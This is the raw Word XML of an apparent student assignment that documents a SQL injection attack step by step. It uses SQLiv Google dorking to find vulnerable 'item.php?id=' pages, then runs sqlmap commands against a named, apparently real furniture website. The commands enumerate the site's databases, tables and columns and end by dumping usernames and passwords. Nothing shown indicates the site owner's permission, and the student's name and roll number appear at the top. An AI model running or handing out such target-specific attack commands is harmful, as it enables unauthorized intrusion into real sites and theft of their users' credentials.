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B213D" w14:textId="2CA85E5C" w:rsidR="009D132B" w:rsidRDefault="009D132B">
      <w:r>
        <w:t xml:space="preserve">Name: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Faizan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Ahmad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5238C3DE" w14:textId="63469A1C" w:rsidR="009D132B" w:rsidRDefault="009D132B">
      <w:r>
        <w:t>Roll Number: 221434448</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E000566" w14:textId="50675013" w:rsidR="009D132B" w:rsidRDefault="009D132B">
      <w:r>
        <w:t>Course: Comp 421 B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2677B6AE" w14:textId="55F763C0" w:rsidR="009D132B" w:rsidRDefault="0043130D">
      <w:r>
        <w:t>Submitted to Professor Dr. Saad Bin Saleem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBAA188" w14:textId="77777777" w:rsidR="005A2313" w:rsidRDefault="005A2313"/>
    <w:p w14:paraId="5D90C501" w14:textId="2F0FDBAC" w:rsidR="002D690F" w:rsidRDefault="00C56055">
      <w:r>
        <w:t xml:space="preserve">First, we will analyze if the database security can be attacked or not. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120E6F9A" w14:textId="2FA991C5" w:rsidR="00C56055" w:rsidRDefault="00C56055">
      <w:r>
        <w:t xml:space="preserve">Step 1: Installing tool </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLiv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2B68EE43" w14:textId="41003F5F" w:rsidR="00C56055" w:rsidRDefault="00C56055">
      <w:r>
        <w:t xml:space="preserve">We will install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLiv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418BE87E" w14:textId="0334D85F" w:rsidR="00C56055" w:rsidRDefault="00C56055">
      <w:r>
        <w:t xml:space="preserve">After installation of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLiv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we will store it in the directory </w:t>
      </w:r>
      <w:r w:rsidRPr="00C56055">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C56055">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C56055">
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C56055">
        <w:t>sqliv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. It can be accessed from the terminal by the command of “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sqliv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5D5F39" w14:textId="221AD5B8" w:rsidR="00C56055" w:rsidRDefault="00C56055"/>
    <w:p w14:paraId="7A85AD4F" w14:textId="34BDFB7E" w:rsidR="00C56055" w:rsidRDefault="00C56055">
      <w:r>
        <w:t xml:space="preserve">Step 2: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027D7555" w14:textId="220AF6D4" w:rsidR="00161A61" w:rsidRDefault="008C1D05">
      <w:r>
        <w:t xml:space="preserve">Google </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dorking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will done the scanning and will help in finding the hole in targets. For that </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>purpose</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> lets use simple dork and will allow </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLiv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to scan through the targets each one of them. It will be searching for </w:t>
      </w:r>
      <w:r w:rsidR="000F38B9">
        <w:t xml:space="preserve">vulnerabilities for the URL pattern </w:t>
      </w:r>
      <w:r w:rsidR="00161A61">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00161A61" w:rsidRPr="008C1D05">
        <w:t>item.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00161A61" w:rsidRPr="008C1D05">
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="00161A61">
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F773BB2" w14:textId="57129BB0" w:rsidR="00C56055" w:rsidRDefault="00C56055">
      <w:r w:rsidRPr="00C56055">
        <w:t xml:space="preserve">~# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C56055">
        <w:t>sqliv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C56055">
        <w:t xml:space="preserve"> -d </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C56055">
        <w:t>inurl:item.php</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C56055">
        <w:t>?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C56055">
        <w:t>= -e google -p 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEB9A88" w14:textId="4202810F" w:rsidR="00161A61" w:rsidRDefault="00161A61">
      <w:r>
        <w:t xml:space="preserve">At the start due to its default settings on search engine it will crawl of first page which comes out to google 10 sites per page. Therefore, we give -p 100 to 10 pages. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27771808" w14:textId="28011F52" w:rsidR="00C56055" w:rsidRDefault="00C56055"/>
    <w:p w14:paraId="4E1B44C3" w14:textId="315E3ED8" w:rsidR="000A2980" w:rsidRDefault="000A2980">
      <w:r>
        <w:t>Step 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CD9B04" w14:textId="0BB2A1D8" w:rsidR="000A2980" w:rsidRDefault="000A2980">
      <w:r>
        <w:t xml:space="preserve">After we have found one SQL injection target, further steps will be followed to do the attack using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Let us </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>take a look</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> at one of them, firstly we will show the database name while inside the database there are columns and rows which have data inside them. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF7A100" w14:textId="4D9C9E8B" w:rsidR="006047A7" w:rsidRDefault="00451067">
      <w:r w:rsidRPr="00451067">
        <w:t xml:space="preserve">Target </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00451067">
        <w:t>URL :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00451067">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00E35CCB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.acfurniture.com/item.php?id=25</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="07B04F6B" w14:textId="7356961A" w:rsidR="00451067" w:rsidRDefault="00451067"/>
    <w:p w14:paraId="27949820" w14:textId="08520A8D" w:rsidR="00451067" w:rsidRDefault="00451067">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Part </w:t>
      </w:r>
      <w:r w:rsidRPr="00451067">
        <w:t xml:space="preserve">A. </w:t>
      </w:r>
      <w:r>
        <w:t>Enumerate Database Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B065CA6" w14:textId="77777777" w:rsidR="00451067" w:rsidRDefault="00451067"/>
    <w:p w14:paraId="3DFA47F0" w14:textId="0A9CC38B" w:rsidR="00451067" w:rsidRDefault="00451067">
      <w:r>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DDFA45" w14:textId="77777777" w:rsidR="00451067" w:rsidRDefault="00451067" w:rsidP="00451067">
      <w:r>
        <w:t xml:space="preserve">~# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u “TARGET URL” --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="08D6EDB4" w14:textId="77777777" w:rsidR="00451067" w:rsidRDefault="00451067" w:rsidP="00451067"/>
    <w:p w14:paraId="3869D48E" w14:textId="77777777" w:rsidR="00451067" w:rsidRDefault="00451067" w:rsidP="00451067">
      <w:r>
        <w:t>-u / --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  <w:r>
        <w:t xml:space="preserve"> Target URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FB9BE2" w14:textId="1C80E0C0" w:rsidR="00451067" w:rsidRDefault="00451067" w:rsidP="00451067">
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Enumerate Database/s name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173AF0AE" w14:textId="4B300F43" w:rsidR="00451067" w:rsidRDefault="00451067" w:rsidP="00451067"/>
    <w:p w14:paraId="0DC66532" w14:textId="1281E3DB" w:rsidR="00451067" w:rsidRDefault="00451067" w:rsidP="00451067">
      <w:r>
        <w:t xml:space="preserve">The command in the compiled form will be, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0F0447" w14:textId="7D2DEEAF" w:rsidR="00451067" w:rsidRDefault="00451067" w:rsidP="00451067">
      <w:r w:rsidRPr="00451067">
        <w:t xml:space="preserve">~# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00451067">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00451067">
        <w:t xml:space="preserve"> -u “http://www.acfurniture.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00451067">
        <w:t>item.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00451067">
        <w:t xml:space="preserve">=25” </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00451067">
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0B60A50C" w14:textId="662A9BD8" w:rsidR="00451067" w:rsidRDefault="00451067" w:rsidP="00451067"/>
    <w:p w14:paraId="0BA99972" w14:textId="424A8364" w:rsidR="00451067" w:rsidRDefault="00451067" w:rsidP="00451067">
      <w:r>
        <w:t xml:space="preserve">Database name is found </w:t>
      </w:r>
      <w:r w:rsidRPr="00451067">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00451067">
        <w:t>acfurniture</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00451067">
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9F5E8E" w14:textId="5FFB5583" w:rsidR="00451067" w:rsidRDefault="00451067" w:rsidP="00451067"/>
    <w:p w14:paraId="2553AD9B" w14:textId="76A37395" w:rsidR="00451067" w:rsidRDefault="00451067" w:rsidP="00451067">
      <w:r>
        <w:t>Part B: Enumerate Table name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779623B8" w14:textId="344073D9" w:rsidR="00451067" w:rsidRDefault="00451067" w:rsidP="00451067">
      <w:r>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A91437" w14:textId="617845A2" w:rsidR="00451067" w:rsidRDefault="00451067" w:rsidP="00451067">
      <w:r w:rsidRPr="00451067">
        <w:t xml:space="preserve">~# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00451067">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00451067">
        <w:t xml:space="preserve"> -u “TARGET URL” -D database-name </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00451067">
        <w:t>tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E761FE9" w14:textId="6D02C553" w:rsidR="00451067" w:rsidRDefault="00451067" w:rsidP="00451067">
      <w:r>
        <w:t>Compiled Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E58EC9A" w14:textId="4D5EA35A" w:rsidR="00451067" w:rsidRDefault="00451067" w:rsidP="00451067">
      <w:r w:rsidRPr="00451067">
        <w:t xml:space="preserve">~# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00451067">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00451067">
        <w:t xml:space="preserve"> -u "http://www.acfurniture.com/item.php?id=25" -D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00451067">
        <w:t>acfurniture</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00451067">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00451067">
        <w:t>tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103653E8" w14:textId="42AD8465" w:rsidR="00451067" w:rsidRDefault="00451067" w:rsidP="00451067"/>
    <w:p w14:paraId="54C36DF7" w14:textId="02345054" w:rsidR="003309A5" w:rsidRDefault="00451067" w:rsidP="00451067">
      <w:r>
        <w:t xml:space="preserve">Now, we have showed that the site acfurniture.com has two databases </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>acfurniture</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00451067">
        <w:t>information_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003309A5">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2EE2A5" w14:textId="7ED3E994" w:rsidR="003309A5" w:rsidRDefault="003309A5" w:rsidP="00451067">
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="003309A5">
        <w:t xml:space="preserve">atabase </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003309A5">
        <w:t>acfurniture</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> has</w:t>
      </w:r>
      <w:r w:rsidRPr="003309A5">
        <w:t xml:space="preserve"> four tables: category, product, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003309A5">
        <w:t>product_hacked</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003309A5">
        <w:t xml:space="preserve">, and settings. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">We have found that no table name is compromised but </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>lets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> keep searching and have a look inside the table. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B4D751" w14:textId="0D0EC53B" w:rsidR="005F3672" w:rsidRDefault="005F3672" w:rsidP="00451067"/>
    <w:p w14:paraId="0AB11000" w14:textId="08060F73" w:rsidR="005F3672" w:rsidRDefault="005F3672" w:rsidP="00451067">
      <w:r>
        <w:t>Part C:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F3672">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Enumerate Columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8B59B5" w14:textId="57CEE166" w:rsidR="005F3672" w:rsidRDefault="005F3672" w:rsidP="00451067">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A9ED88" w14:textId="3E9C2632" w:rsidR="005F3672" w:rsidRDefault="005F3672" w:rsidP="00451067">
      <w:r w:rsidRPr="005F3672">
        <w:t xml:space="preserve">~# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F3672">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F3672">
        <w:t xml:space="preserve"> -u “TARGET URL” -D database-name -T table-name </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="005F3672">
        <w:t>columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0465F8FC" w14:textId="2EAFA444" w:rsidR="005F3672" w:rsidRDefault="005F3672" w:rsidP="00451067">
      <w:r>
        <w:t>Compiled command will be like,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233D7F39" w14:textId="2FB4A41F" w:rsidR="005F3672" w:rsidRDefault="005F3672" w:rsidP="00451067">
      <w:r w:rsidRPr="005F3672">
        <w:t xml:space="preserve">~# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F3672">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F3672">
        <w:t xml:space="preserve"> -u "http://www.acfurniture.com/item.php?id=25" -D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F3672">
        <w:t>acfurniture</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F3672">
        <w:t xml:space="preserve"> -T settings </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="005F3672">
        <w:t>columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145C509E" w14:textId="2D97C608" w:rsidR="005F3672" w:rsidRDefault="005F3672" w:rsidP="00451067">
      <w:r>
        <w:t>And we will have the output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3294F2F4" w14:textId="2C80ED90" w:rsidR="005F3672" w:rsidRDefault="005F3672" w:rsidP="00451067">
      <w:r>
        <w:t xml:space="preserve">This setting table consists of 6 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>columns</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and this is a credential account. Now </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>lets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> dump this data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692666A1" w14:textId="36D6DB2F" w:rsidR="005F3672" w:rsidRDefault="00495CDB" w:rsidP="00451067">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA36334" w14:textId="7888E462" w:rsidR="00495CDB" w:rsidRDefault="00495CDB" w:rsidP="00451067">
      <w:r>
        <w:t>Part D: Dump Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AE8BF9" w14:textId="32A343BB" w:rsidR="00495CDB" w:rsidRDefault="00495CDB" w:rsidP="00451067">
      <w:r>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6A3AF8" w14:textId="1A015916" w:rsidR="00495CDB" w:rsidRDefault="00495CDB" w:rsidP="00451067">
      <w:r w:rsidRPr="00495CDB">
        <w:t xml:space="preserve">~# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00495CDB">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00495CDB">
        <w:t xml:space="preserve"> -u “TARGET URL” -D database-name -T table-name -C columns </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00495CDB">
        <w:t>dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DCB512" w14:textId="1DF86060" w:rsidR="00495CDB" w:rsidRDefault="00495CDB" w:rsidP="00451067">
      <w:r>
        <w:t>Compiled command will be like,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C95F646" w14:textId="5D7760A3" w:rsidR="00495CDB" w:rsidRDefault="00495CDB" w:rsidP="00451067">
      <w:r w:rsidRPr="00495CDB">
        <w:t xml:space="preserve">~# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00495CDB">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00495CDB">
        <w:t xml:space="preserve"> -u "http://www.acfurniture.com/item.php?id=25" -D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00495CDB">
        <w:t>acfurniture</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00495CDB">
        <w:t xml:space="preserve"> -T settings -C </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00495CDB">
        <w:t>username,password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00495CDB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00495CDB">
        <w:t>dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EC03E2" w14:textId="47C34447" w:rsidR="00495CDB" w:rsidRDefault="00495CDB" w:rsidP="00451067"/>
    <w:p w14:paraId="291F2353" w14:textId="6834FC66" w:rsidR="00495CDB" w:rsidRDefault="00495CDB" w:rsidP="00451067">
      <w:r>
        <w:t xml:space="preserve">The output will be shown in which username, </w:t>
      </w:r>
      <w:r w:rsidR="00195ABD">
        <w:t>email</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and password is shown. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712B1060" w14:textId="1C203900" w:rsidR="00495CDB" w:rsidRDefault="00495CDB" w:rsidP="00451067"/>
    <w:p w14:paraId="1B377B83" w14:textId="342A1D58" w:rsidR="00495CDB" w:rsidRDefault="00495CDB" w:rsidP="00451067">
      <w:r>
        <w:t xml:space="preserve">Now we have done dumping data into database using SQL injection. </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0049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10"/>
    <w:rsid w:val="000A2980"/>
    <w:rsid w:val="000F38B9"/>
    <w:rsid w:val="00161A61"/>
    <w:rsid w:val="00195ABD"/>
    <w:rsid w:val="00207C4A"/>
    <w:rsid w:val="002D690F"/>
    <w:rsid w:val="003309A5"/>
    <w:rsid w:val="0043130D"/>
    <w:rsid w:val="00451067"/>
    <w:rsid w:val="00495CDB"/>
    <w:rsid w:val="005A2313"/>
    <w:rsid w:val="005F3672"/>
    <w:rsid w:val="006047A7"/>
    <w:rsid w:val="006F31CA"/>
    <w:rsid w:val="008C1D05"/>
    <w:rsid w:val="009D132B"/>
    <w:rsid w:val="00C56055"/>
    <w:rsid w:val="00E2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56ED"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3B9864DF-9ECF-4797-BEAF-8B766C99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10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1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cfurniture.com/item.php?id=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2022-04-15T16:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-15T17:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>